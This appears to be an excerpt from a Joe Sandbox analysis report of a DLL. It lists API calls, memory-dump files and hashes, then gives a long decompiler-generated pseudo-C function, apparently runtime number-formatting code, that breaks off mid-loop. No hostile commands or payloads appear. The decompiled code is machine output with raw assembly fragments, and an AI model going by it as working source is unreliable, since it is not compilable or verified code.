Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetACP.KERNEL32(?,?,?,?,?,?,6DA6361F,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA6C06F
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DA6361F,?,?,?,00000055,?,-00000050,?,?), ref: 6DA6C09A
_wcschr.LIBVCRUNTIME ref: 6DA6C12E
_wcschr.LIBVCRUNTIME ref: 6DA6C13C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA6C1FD

Strings

utf8, xrefs: 6DA6C16C

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 57aa1b37823c05776c3d2ed289737c73fe8c2f3ad3e43728c54b304e3393430d
Instruction ID: 4560173d3b507908df90100b570364484dfe334c62df87bea6281f2451cf2257
Opcode Fuzzy Hash: 57aa1b37823c05776c3d2ed289737c73fe8c2f3ad3e43728c54b304e3393430d
Instruction Fuzzy Hash: C471C37560C386EAEB15AF74CD41BA67BB8EF09304F064529EA15DB1C0EB74D9C087B1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6CC86 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E6DA6CC86(signed int __edx, void* __edi, void* __eflags, signed char _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				char _v1881;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				intOrPtr _v1912;
				signed int* _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				signed int _v1932;
				signed int _v1936;
				char _v1944;
				signed int _v1952;
				signed int _v1956;
				char _v2416;
				signed int _v2420;
				signed int _v2448;
				void* __ebx;
				void* __esi;
				signed int _t802;
				intOrPtr _t812;
				signed int _t819;
				signed int _t825;
				void* _t829;
				signed int _t830;
				intOrPtr _t836;
				void* _t837;
				signed int _t843;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t863;
				signed int _t864;
				signed int _t869;
				signed int _t871;
				signed int _t872;
				signed int _t879;
				signed int _t880;
				signed int _t888;
				signed int _t891;
				signed int _t896;
				signed int* _t899;
				signed int _t903;
				signed int _t914;
				signed int _t915;
				signed int _t917;
				signed int _t918;
				char* _t919;
				signed int _t922;
				signed int _t928;
				signed int _t930;
				signed int _t934;
				signed int _t942;
				signed int _t945;
				signed int _t948;
				signed int _t951;
				signed int _t960;
				signed int _t961;
				signed int _t964;
				signed int _t977;
				signed int _t978;
				signed int _t980;
				signed int _t981;
				signed int* _t982;
				signed int _t985;
				signed int* _t988;
				signed int _t991;
				signed int _t993;
				signed int _t998;
				signed int _t1006;
				signed int _t1009;
				signed int _t1013;
				signed int _t1016;
				signed int _t1025;
				intOrPtr _t1030;
				signed int _t1031;
				signed int _t1037;
				void* _t1045;
				signed int _t1046;
				signed int _t1047;
				signed int _t1048;
				signed int* _t1051;
				signed int _t1059;
				signed int _t1063;
				signed int _t1065;
				signed int _t1070;
				void* _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1082;
				signed int _t1087;
				signed int _t1088;
				signed int _t1092;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				void* _t1105;
				signed char _t1106;
				signed int _t1112;
				signed int _t1113;
				signed int _t1115;
				signed int _t1122;
				void* _t1127;
				signed char _t1133;
				intOrPtr* _t1136;
				signed int _t1141;
				signed int _t1142;
				void* _t1144;
				signed int _t1147;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1158;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1167;
				signed int* _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1179;
				signed int _t1181;
				signed int _t1182;
				signed int _t1186;
				signed int _t1187;
				unsigned int _t1188;
				unsigned int _t1192;
				unsigned int _t1195;
				signed int _t1196;
				signed int _t1199;
				signed int* _t1202;
				signed int _t1205;
				void* _t1207;
				unsigned int _t1208;
				signed int _t1209;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1218;
				signed char _t1220;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1233;
				signed int _t1235;
				signed int _t1237;
				char _t1240;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				void* _t1255;
				signed int _t1256;
				signed int _t1258;
				signed int _t1263;
				signed int _t1267;
				void* _t1268;
				intOrPtr _t1269;
				void* _t1272;
				unsigned int _t1275;
				signed int _t1276;
				void* _t1277;
				signed int _t1279;
				signed int _t1280;
				signed int _t1281;
				signed int _t1282;
				signed int _t1285;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				void* _t1296;
				void* _t1299;
				signed int _t1301;
				signed int _t1305;
				signed int* _t1307;
				signed int _t1311;
				signed int _t1312;
				signed int _t1315;
				signed int _t1317;
				signed int _t1318;
				signed int _t1320;
				void* _t1323;
				void* _t1324;
				signed int _t1326;
				signed int _t1327;
				signed int _t1328;
				signed int _t1330;
				signed int _t1331;
				signed int _t1332;
				signed int _t1334;
				signed int _t1344;
				void* _t1346;
				signed char* _t1347;
				signed char* _t1348;
				signed int _t1352;
				signed char _t1360;

				_t1268 = __edi;
				_t1227 = __edx;
				_t802 =  *0x6da83014; // 0xa0d58914
				_v8 = _t802 ^ _t1344;
				_v1932 = _a20;
				_v1888 = _a24;
				E6DA70952(__eflags,  &_v1952);
				_t1122 = 1;
				if((_v1952 & 0x0000001f) != 0x1f) {
					E6DA709BA(__eflags,  &_v1952);
					_v1944 = 1;
				} else {
					_v1944 = 0;
				}
				_t1315 = _a8;
				_push(_t1268);
				_t1269 = 0x20;
				_t1352 = _t1315;
				if(_t1352 > 0 || _t1352 >= 0 && _a4 >= 0) {
					_t812 = _t1269;
				} else {
					_t812 = 0x2d;
				}
				_t1136 = _v1932;
				 *_t1136 = _t812;
				 *((intOrPtr*)(_t1136 + 8)) = _v1888;
				E6DA708F3( &_v1956, 0, 0);
				_t1347 = _t1346 + 0xc;
				if((_t1315 & 0x7ff00000) != 0) {
					L12:
					_t819 = E6DA647F7( &_a4);
					__eflags = _t819;
					if(_t819 == 0) {
						L24:
						_v1936 = _v1936 & 0x00000000;
						_a8 = _t1315 & 0x7fffffff;
						_t1360 = _a4;
						asm("fst qword [ebp-0x774]");
						_t1317 = _v1908;
						_v1928 = _a12 + 1;
						_t1141 = _t1317 >> 0x14;
						_t825 = _t1141 & 0x000007ff;
						__eflags = _t825;
						if(_t825 != 0) {
							_t825 = 0;
							_t1228 = 0x100000;
							_t41 =  &_v1868;
							 *_t41 = _v1868 & 0;
							__eflags =  *_t41;
						} else {
							_t1228 = 0;
							_v1868 = _t1122;
						}
						_t1318 = _t1317 & 0x000fffff;
						_v1924 = _v1912 + _t825;
						asm("adc esi, edx");
						_t1142 = _t1141 & 0x000007ff;
						_v1872 = _v1868 + _t1142;
						E6DA70A10(_t1142, _t1360);
						_push(_t1142);
						 *_t1347 = _t1360;
						_t829 = E6DA70B20(_t1142);
						_t1144 = _t1142;
						_t830 = L6DA71FF0(_t829, _t1122, _t1144, _t1228);
						_v1904 = _t830;
						_t1272 = 0x20;
						__eflags = _t830 - 0x7fffffff;
						if(_t830 == 0x7fffffff) {
							L29:
							__eflags = 0;
							_v1904 = 0;
						} else {
							__eflags = _t830 - 0x80000000;
							if(_t830 == 0x80000000) {
								goto L29;
							}
						}
						_t1229 = _v1872;
						__eflags = _t1318;
						_v468 = _v1924;
						_v464 = _t1318;
						_t1147 = (0 | _t1318 != 0x00000000) + 1;
						_v1868 = _t1147;
						_v472 = _t1147;
						__eflags = _t1229 - 0x433;
						if(_t1229 < 0x433) {
							__eflags = _t1229 - 0x35;
							if(_t1229 == 0x35) {
								L100:
								__eflags = _t1318;
								_t211 =  &_v1908;
								 *_t211 = _v1908 & 0x00000000;
								__eflags =  *_t211;
								_t836 =  *((intOrPtr*)(_t1344 + 4 + (0 | _t1318 != 0x00000000) * 4 - 0x1d4));
								asm("bsr eax, eax");
								if( *_t211 == 0) {
									_t837 = 0;
									__eflags = 0;
								} else {
									_t837 = _t836 + 1;
								}
								__eflags = _t1272 - _t837 - _t1122;
								asm("sbb esi, esi");
								_t1320 =  ~_t1318 + _t1147;
								__eflags = _t1320 - 0x73;
								if(_t1320 <= 0x73) {
									_t1230 = _t1320 - 1;
									__eflags = _t1230 - 0xffffffff;
									if(_t1230 != 0xffffffff) {
										_t1296 = _t1230 - 1;
										while(1) {
											__eflags = _t1230 - _t1147;
											if(_t1230 >= _t1147) {
												_t1025 = 0;
												__eflags = 0;
											} else {
												_t1025 =  *(_t1344 + _t1230 * 4 - 0x1d0);
											}
											__eflags = _t1296 - _t1147;
											if(_t1296 >= _t1147) {
												_t1188 = 0;
												__eflags = 0;
											} else {
												_t1188 =  *(_t1344 + _t1230 * 4 - 0x1d4);
											}
											 *(_t1344 + _t1230 * 4 - 0x1d0) = _t1188 >> 0x0000001f | _t1025 + _t1025;
											_t1230 = _t1230 - 1;
											_t1296 = _t1296 - 1;
											__eflags = _t1230 - 0xffffffff;
											if(_t1230 == 0xffffffff) {
												goto L115;
											}
											_t1147 = _v472;
										}
									}
									L115:
									_v472 = _t1320;
								} else {
									_v1400 = _v1400 & 0x00000000;
									_v472 = _v472 & 0x00000000;
									E6DA60928( &_v468, 0x1cc,  &_v1396, 0);
									_t1347 =  &(_t1347[0x10]);
								}
								_t1275 = 0x434 >> 5;
								E6DA5B0A0(0x434 >> 5,  &_v1396, 0, 0x434);
								__eflags = 1;
								 *(_t1344 + 0xbad63d) = 1 << (0x00000434 - _v1872 & 0x0000001f);
							} else {
								_v1396 = _v1396 & 0x00000000;
								_v1392 = 0x100000;
								_v1400 = 2;
								__eflags = _t1318;
								if(_t1318 != 0) {
									_t1255 = 0;
									__eflags = 0;
									while(1) {
										_t1030 =  *((intOrPtr*)(_t1344 + _t1255 - 0x570));
										__eflags = _t1030 -  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0));
										if(_t1030 !=  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0))) {
											goto L100;
										}
										_t1255 = _t1255 + 4;
										__eflags = _t1255 - 8;
										if(_t1255 != 8) {
											continue;
										} else {
											__eflags = 0;
											asm("bsr eax, esi");
											_v1908 = 0;
											if(0 == 0) {
												_t1031 = 0;
											} else {
												_t1031 = _t1030 + 1;
											}
											__eflags = _t1272 - _t1031 - 2;
											asm("sbb esi, esi");
											_t1334 =  ~_t1318 + _t1147;
											__eflags = _t1334 - 0x73;
											if(_t1334 <= 0x73) {
												_t1256 = _t1334 - 1;
												__eflags = _t1256 - 0xffffffff;
												if(_t1256 != 0xffffffff) {
													_t1299 = _t1256 - 1;
													while(1) {
														__eflags = _t1256 - _t1147;
														if(_t1256 >= _t1147) {
															_t1037 = 0;
														} else {
															_t1037 =  *(_t1344 + _t1256 * 4 - 0x1d0);
														}
														__eflags = _t1299 - _t1147;
														if(_t1299 >= _t1147) {
															_t1192 = 0;
														} else {
															_t1192 =  *(_t1344 + _t1256 * 4 - 0x1d4);
														}
														 *(_t1344 + _t1256 * 4 - 0x1d0) = _t1192 >> 0x0000001e | _t1037 << 0x00000002;
														_t1256 = _t1256 - 1;
														_t1299 = _t1299 - 1;
														__eflags = _t1256 - 0xffffffff;
														if(_t1256 == 0xffffffff) {
															goto L98;
														}
														_t1147 = _v472;
													}
												}
												L98:
												_v472 = _t1334;
											} else {
												_v1400 = 0;
												_v472 = 0;
												E6DA60928( &_v468, 0x1cc,  &_v1396, 0);
												_t1347 =  &(_t1347[0x10]);
											}
											_t1275 = 0x435 >> 5;
											E6DA5B0A0(0x435 >> 5,  &_v1396, 0, 0x435);
											 *(_t1344 + 0xbad63d) = 1 << (0x00000435 - _v1872 & 0x0000001f);
										}
										goto L117;
									}
								}
								goto L100;
							}
							L117:
							_t843 = _t1275 + 1;
							_t1323 = 0x1cc;
							_v1400 = _t843;
							_v936 = _t843;
							E6DA60928( &_v932, 0x1cc,  &_v1396, _t843 << 2);
							_t1348 =  &(_t1347[0x1c]);
							_t1122 = 1;
							__eflags = 1;
						} else {
							_v1396 = _v1396 & 0x00000000;
							_v1392 = 0x100000;
							_v1400 = 2;
							__eflags = _t1318;
							if(_t1318 == 0) {
								L57:
								_t1195 = _t1229 - 0x432;
								_t1196 = _t1195 & 0x0000001f;
								_v1880 = _t1195 >> 5;
								_v1896 = _t1196;
								_v1924 = _t1272 - _t1196;
								_t1045 = E6DA71ED0(_t1122, _t1272 - _t1196, 0);
								_t1258 = _v1868;
								_t1046 = _t1045 - 1;
								_t130 =  &_v1908;
								 *_t130 = _v1908 & 0x00000000;
								__eflags =  *_t130;
								_v1876 = _t1046;
								_t1047 =  !_t1046;
								_v1920 = _t1047;
								asm("bsr eax, ecx");
								if( *_t130 == 0) {
									_t138 =  &_v1868;
									 *_t138 = _v1868 & 0x00000000;
									__eflags =  *_t138;
								} else {
									_v1868 = _t1047 + 1;
								}
								_t1199 = _v1880;
								_t1323 = 0x1cc;
								_t1048 = _t1199 + _t1258;
								__eflags = _t1048 - 0x73;
								if(_t1048 <= 0x73) {
									__eflags = _t1272 - _v1868 - _v1896;
									asm("sbb eax, eax");
									_t1051 =  ~_t1048 + _t1199 + _t1258;
									_v1916 = _t1051;
									__eflags = _t1051 - 0x73;
									if(_t1051 > 0x73) {
										goto L61;
									} else {
										_t1301 = _t1199 - 1;
										_t1059 = _t1051 - 1;
										_v1900 = _t1301;
										_v1872 = _t1059;
										__eflags = _t1059 - _t1301;
										if(_t1059 != _t1301) {
											_t1305 = _t1059 - _t1199;
											__eflags = _t1305;
											_t1202 =  &(( &_v472)[_t1305]);
											_v1892 = _t1202;
											while(1) {
												__eflags = _t1305 - _t1258;
												if(_t1305 >= _t1258) {
													_t1063 = 0;
													__eflags = 0;
												} else {
													_t1063 = _t1202[1];
												}
												_v1868 = _t1063;
												_t158 = _t1305 - 1; // -4
												__eflags = _t158 - _t1258;
												if(_t158 >= _t1258) {
													_t1065 = 0;
													__eflags = 0;
												} else {
													_t1065 =  *_t1202;
												}
												_t1205 = _v1872;
												 *(_t1344 + _t1205 * 4 - 0x1d0) = (_t1065 & _v1920) >> _v1924 | (_v1868 & _v1876) << _v1896;
												_t1070 = _t1205 - 1;
												_t1202 = _v1892 - 4;
												_v1872 = _t1070;
												_t1305 = _t1305 - 1;
												_v1892 = _t1202;
												__eflags = _t1070 - _v1900;
												if(_t1070 == _v1900) {
													break;
												}
												_t1258 = _v472;
											}
											_t1199 = _v1880;
										}
										__eflags = _t1199;
										if(_t1199 != 0) {
											__eflags = 0;
											memset( &_v468, 0, _t1199 << 2);
											_t1347 =  &(_t1347[0xc]);
										}
										_v472 = _v1916;
									}
								} else {
									L61:
									_v1400 = 0;
									_v472 = 0;
									E6DA60928( &_v468, _t1323,  &_v1396, 0);
									_t1347 =  &(_t1347[0x10]);
								}
								_v1396 = 2;
								_push(4);
							} else {
								_t1207 = 0;
								__eflags = 0;
								while(1) {
									__eflags =  *((intOrPtr*)(_t1344 + _t1207 - 0x570)) -  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0));
									if( *((intOrPtr*)(_t1344 + _t1207 - 0x570)) !=  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0))) {
										goto L57;
									}
									_t1207 = _t1207 + 4;
									__eflags = _t1207 - 8;
									if(_t1207 != 8) {
										continue;
									} else {
										_t1208 = _t1229 - 0x431;
										_t1209 = _t1208 & 0x0000001f;
										_v1880 = _t1208 >> 5;
										_v1896 = _t1209;
										_v1876 = _t1272 - _t1209;
										_t1076 = E6DA71ED0(_t1122, _t1272 - _t1209, 0);
										_t1263 = _v1868;
										_t1077 = _t1076 - 1;
										_t70 =  &_v1908;
										 *_t70 = _v1908 & 0x00000000;
										__eflags =  *_t70;
										_v1900 = _t1077;
										_t1078 =  !_t1077;
										_v1924 = _t1078;
										asm("bsr eax, ecx");
										if( *_t70 == 0) {
											_t78 =  &_v1868;
											 *_t78 = _v1868 & 0x00000000;
											__eflags =  *_t78;
										} else {
											_v1868 = _t1078 + 1;
										}
										_t1212 = _v1880;
										_t1323 = 0x1cc;
										_t1079 = _t1212 + _t1263;
										__eflags = _t1079 - 0x73;
										if(_t1079 <= 0x73) {
											__eflags = _t1272 - _v1868 - _v1896;
											asm("sbb eax, eax");
											_t1082 =  ~_t1079 + _t1212 + _t1263;
											_v1920 = _t1082;
											__eflags = _t1082 - 0x73;
											if(_t1082 > 0x73) {
												goto L39;
											} else {
												_t1307 = _t1212 - 1;
												_t1088 = _t1082 - 1;
												_v1916 = _t1307;
												_v1872 = _t1088;
												__eflags = _t1088 - _t1307;
												if(_t1088 != _t1307) {
													_t1311 = _t1088 - _t1212;
													__eflags = _t1311;
													_t1215 =  &(( &_v472)[_t1311]);
													_v1892 = _t1215;
													while(1) {
														__eflags = _t1311 - _t1263;
														if(_t1311 >= _t1263) {
															_t1092 = 0;
															__eflags = 0;
														} else {
															_t1092 = _t1215[1];
														}
														_v1868 = _t1092;
														_t98 = _t1311 - 1; // -4
														__eflags = _t98 - _t1263;
														if(_t98 >= _t1263) {
															_t1094 = 0;
															__eflags = 0;
														} else {
															_t1094 =  *_t1215;
														}
														_t1218 = _v1872;
														 *(_t1344 + _t1218 * 4 - 0x1d0) = (_t1094 & _v1924) >> _v1876 | (_v1868 & _v1900) << _v1896;
														_t1099 = _t1218 - 1;
														_t1215 = _v1892 - 4;
														_v1872 = _t1099;
														_t1311 = _t1311 - 1;
														_v1892 = _t1215;
														__eflags = _t1099 - _v1916;
														if(_t1099 == _v1916) {
															break;
														}
														_t1263 = _v472;
													}
													_t1212 = _v1880;
												}
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = 0;
													memset( &_v468, 0, _t1212 << 2);
													_t1347 =  &(_t1347[0xc]);
												}
												_v472 = _v1920;
											}
										} else {
											L39:
											_v1400 = 0;
											_v472 = 0;
											E6DA60928( &_v468, _t1323,  &_v1396, 0);
											_t1347 =  &(_t1347[0x10]);
										}
										_t1087 = 4;
										_v1396 = _t1087;
										_push(_t1087);
									}
									goto L56;
								}
								goto L57;
							}
							L56:
							_v1392 = _v1392 & 0x00000000;
							_push( &_v1396);
							_v936 = _t1122;
							_push(_t1323);
							_push( &_v932);
							_v1400 = _t1122;
							E6DA60928();
							_t1348 =  &(_t1347[0x10]);
						}
						_t848 = _v1904;
						_t1149 = 0xa;
						_v1924 = _t1149;
						__eflags = _t848;
						if(_t848 < 0) {
							_t849 =  ~_t848;
							_t850 = _t849 / _t1149;
							_v1916 = _t850;
							_t1150 = _t849 % _t1149;
							_v1908 = _t1150;
							__eflags = _t850;
							if(_t850 == 0) {
								L250:
								__eflags = _t1150;
								if(_t1150 != 0) {
									_t896 =  *(0x6da76f14 + _t1150 * 4);
									_v1908 = _t896;
									__eflags = _t896;
									if(_t896 == 0) {
										L262:
										__eflags = 0;
										_push(0);
										_v472 = 0;
										_v2420 = 0;
										goto L263;
									} else {
										__eflags = _t896 - _t1122;
										if(_t896 != _t1122) {
											_t1165 = _v472;
											__eflags = _t1165;
											if(_t1165 != 0) {
												_v1876 = _v1876 & 0x00000000;
												_t1282 = 0;
												__eflags = 0;
												do {
													_t1244 = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) >> 0x20;
													 *(_t1344 + _t1282 * 4 - 0x1d0) = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) + _v1876;
													_t896 = _v1908;
													asm("adc edx, 0x0");
													_t1282 = _t1282 + 1;
													_v1876 = _t1244;
													__eflags = _t1282 - _t1165;
												} while (_t1282 != _t1165);
												__eflags = _t1244;
												if(_t1244 != 0) {
													_t903 = _v472;
													__eflags = _t903 - 0x73;
													if(_t903 >= 0x73) {
														goto L262;
													} else {
														 *(_t1344 + _t903 * 4 - 0x1d0) = _t1244;
														_v472 = _v472 + 1;
													}
												}
											}
										}
									}
								}
							} else {
								do {
									__eflags = _t850 - 0x26;
									if(_t850 > 0x26) {
										_t850 = 0x26;
									}
									_t1166 =  *(0x6da76e7e + _t850 * 4) & 0x000000ff;
									_v1880 = _t850;
									_v1400 = ( *(0x6da76e7f + _t850 * 4) & 0x000000ff) + ( *(0x6da76e7e + _t850 * 4) & 0x000000ff);
									E6DA5B0A0(_t1166 << 2,  &_v1396, 0, _t1166 << 2);
									_t914 = E6DA5AB10( &(( &_v1396)[_t1166]), 0x6da76578 + ( *(0x6da76e7c + _v1880 * 4) & 0x0000ffff) * 4, ( *(0x6da76e7f + _t850 * 4) & 0x000000ff) << 2);
									_t1245 = _v1400;
									_t1348 =  &(_t1348[0x18]);
									_v1872 = _t1245;
									__eflags = _t1245 - _t1122;
									if(_t1245 > _t1122) {
										__eflags = _v472 - _t1122;
										if(_v472 > _t1122) {
											__eflags = _t1245 - _v472;
											_t1326 =  &_v1396;
											_t547 = _t1245 - _v472 > 0;
											__eflags = _t547;
											_t915 = _t914 & 0xffffff00 | _t547;
											if(_t547 >= 0) {
												_t1326 =  &_v468;
											}
											_v1892 = _t1326;
											__eflags = _t915;
											if(_t915 == 0) {
												_v1896 = _t1245;
												_t1245 = _v472;
												_v1872 = _t1245;
												_v1876 =  &_v1396;
											} else {
												_v1896 = _v472;
												_v1876 =  &_v468;
											}
											_t917 = 0;
											_t1285 = 0;
											_v1864 = 0;
											__eflags = _t1245;
											if(_t1245 == 0) {
												L244:
												_v472 = _t917;
												_t1323 = 0x1cc;
												_t918 = _t917 << 2;
												__eflags = _t918;
												_push(_t918);
												_t919 =  &_v1860;
												goto L245;
											} else {
												do {
													__eflags =  *(_t1326 + _t1285 * 4);
													if( *(_t1326 + _t1285 * 4) != 0) {
														_t1167 = 0;
														_t1327 = _t1285;
														_v1868 = 0;
														_v1900 = 0;
														__eflags = _v1896;
														if(_v1896 != 0) {
															_t1246 = 0;
															while(1) {
																__eflags = _t1327 - 0x73;
																if(_t1327 == 0x73) {
																	break;
																}
																__eflags = _t1327 - _t917;
																if(_t1327 == _t917) {
																	 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) & 0x00000000;
																	_t579 = _t1285 + 1; // 0x1
																	_t934 = _t579 + _t1167;
																	__eflags = _t934;
																	_v1864 = _t934;
																}
																_t930 =  *(_v1876 + _t1167 * 4);
																_t1170 = _v1892;
																_t1246 = _t930 *  *(_t1170 + _t1285 * 4) >> 0x20;
																asm("adc edx, 0x0");
																 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) + _t930 *  *(_t1170 + _t1285 * 4) + _v1868;
																_t917 = _v1864;
																asm("adc edx, 0x0");
																_t1167 = _v1900 + 1;
																_t1327 = _t1327 + 1;
																_v1868 = _t1246;
																_v1900 = _t1167;
																__eflags = _t1167 - _v1896;
																if(_t1167 != _v1896) {
																	continue;
																}
																break;
															}
															__eflags = _t1246;
															if(_t1246 != 0) {
																_t1169 =  &_v1860 + _t1327 * 4;
																_v1868 = _t1169;
																while(1) {
																	__eflags = _t1327 - 0x73;
																	if(_t1327 == 0x73) {
																		goto L240;
																	}
																	__eflags = _t1327 - _t917;
																	if(_t1327 == _t917) {
																		 *_t1169 =  *_t1169 & 0x00000000;
																		__eflags =  *_t1169;
																		_t609 = _t1327 + 1; // 0x1
																		_v1864 = _t609;
																	}
																	_v1868 = _v1868 + 4;
																	_t928 = _t1246;
																	_t1327 = _t1327 + 1;
																	_t1246 = 0;
																	 *_t1169 =  *_t1169 + _t928;
																	__eflags =  *_t1169;
																	_t917 = _v1864;
																	asm("adc edx, edx");
																	if( *_t1169 != 0) {
																		_t1169 = _v1868;
																		continue;
																	}
																	goto L240;
																}
															}
															L240:
															_t1245 = _v1872;
														}
														__eflags = _t1327 - 0x73;
														if(_t1327 == 0x73) {
															_t1323 = 0x1cc;
															goto L260;
														} else {
															_t1326 = _v1892;
															goto L243;
														}
													} else {
														__eflags = _t1285 - _t917;
														if(_t1285 == _t917) {
															 *(_t1344 + _t1285 * 4 - 0x740) =  *(_t1344 + _t1285 * 4 - 0x740) & 0x00000000;
															_t568 = _t1285 + 1; // 0x1
															_t917 = _t568;
															_v1864 = _t917;
														}
														goto L243;
													}
													goto L247;
													L243:
													_t1285 = _t1285 + 1;
													__eflags = _t1285 - _t1245;
												} while (_t1285 != _t1245);
												goto L244;
											}
										} else {
											_t1286 = _v468;
											_t1323 = 0x1cc;
											_v1936 = _t1286;
											_v472 = _t1245;
											E6DA60928( &_v468, 0x1cc,  &_v1396, _t1245 << 2);
											_t1348 =  &(_t1348[0x10]);
											__eflags = _t1286;
											if(_t1286 != 0) {
												__eflags = _t1286 - _t1122;
												if(_t1286 == _t1122) {
													goto L246;
												} else {
													__eflags = _v472;
													if(_v472 == 0) {
														goto L246;
													} else {
														_t1174 = 0;
														_v1920 = _v472;
														_t1287 = 0;
														__eflags = 0;
														do {
															_t942 = _v1936;
															_t1247 = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) >> 0x20;
															 *(_t1344 + _t1287 * 4 - 0x1d0) = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) + _t1174;
															asm("adc edx, 0x0");
															_t1287 = _t1287 + 1;
															_t1174 = _t1247;
															__eflags = _t1287 - _v1920;
														} while (_t1287 != _v1920);
														__eflags = _t1174;
														if(_t1174 == 0) {
															goto L246;
														} else {
															_t945 = _v472;
															__eflags = _t945 - 0x73;
															if(_t945 >= 0x73) {
																L260:
																_v2420 = 0;
																_v472 = 0;
																E6DA60928( &_v468, _t1323,  &_v2416, 0);
																_t1348 =  &(_t1348[0x10]);
																_t922 = 0;
															} else {
																 *(_t1344 + _t945 * 4 - 0x1d0) = _t1174;
																_v472 = _v472 + 1;
																goto L246;
															}
														}
													}
												}
											} else {
												_v2420 = 0;
												_v472 = 0;
												_push(0);
												_t919 =  &_v2416;
												L245:
												_push(_t919);
												_push(_t1323);
												_push( &_v468);
												E6DA60928();
												_t1348 =  &(_t1348[0x10]);
												L246:
												_t922 = _t1122;
											}
										}
									} else {
										_t1288 = _v1396;
										__eflags = _t1288;
										if(_t1288 != 0) {
											__eflags = _t1288 - _t1122;
											if(_t1288 == _t1122) {
												goto L198;
											} else {
												__eflags = _v472;
												if(_v472 == 0) {
													goto L198;
												} else {
													_t1175 = 0;
													_v1936 = _v472;
													_t1328 = 0;
													__eflags = 0;
													do {
														_t948 = _t1288;
														_t1248 = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) >> 0x20;
														 *(_t1344 + _t1328 * 4 - 0x1d0) = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) + _t1175;
														asm("adc edx, 0x0");
														_t1328 = _t1328 + 1;
														_t1175 = _t1248;
														__eflags = _t1328 - _v1936;
													} while (_t1328 != _v1936);
													__eflags = _t1175;
													if(_t1175 == 0) {
														goto L198;
													} else {
														_t951 = _v472;
														__eflags = _t951 - 0x73;
														if(_t951 >= 0x73) {
															_v2420 = 0;
															_v472 = 0;
															E6DA60928( &_v468, 0x1cc,  &_v2416, 0);
															_t1348 =  &(_t1348[0x10]);
															_t922 = 0;
															goto L199;
														} else {
															 *(_t1344 + _t951 * 4 - 0x1d0) = _t1175;
															_v472 = _v472 + 1;
															goto L198;
														}
													}
												}
											}
											goto L265;
										} else {
											__eflags = 0;
											_v2420 = 0;
											_v472 = 0;
											E6DA60928( &_v468, 0x1cc,  &_v2416, 0);
											_t1348 =  &(_t1348[0x10]);
											L198:
											_t922 = _t1122;
										}
										L199:
										_t1323 = 0x1cc;
									}
									L247:
									__eflags = _t922;
									if(_t922 == 0) {
										_v2420 = _v2420 & 0x00000000;
										_v472 = _v472 & 0x00000000;
										_push(0);
										L263:
										_push( &_v2416);
										_t899 =  &_v468;
										goto L264;
									} else {
										goto L248;
									}
									goto L265;
									L248:
									_t850 = _v1916 - _v1880;
									__eflags = _t850;
									_v1916 = _t850;
								} while (_t850 != 0);
								_t1150 = _v1908;
